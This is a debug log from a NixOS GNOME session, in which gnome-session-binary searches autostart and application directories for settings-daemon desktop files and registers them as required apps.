machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App3 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App3 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App4 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App4 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
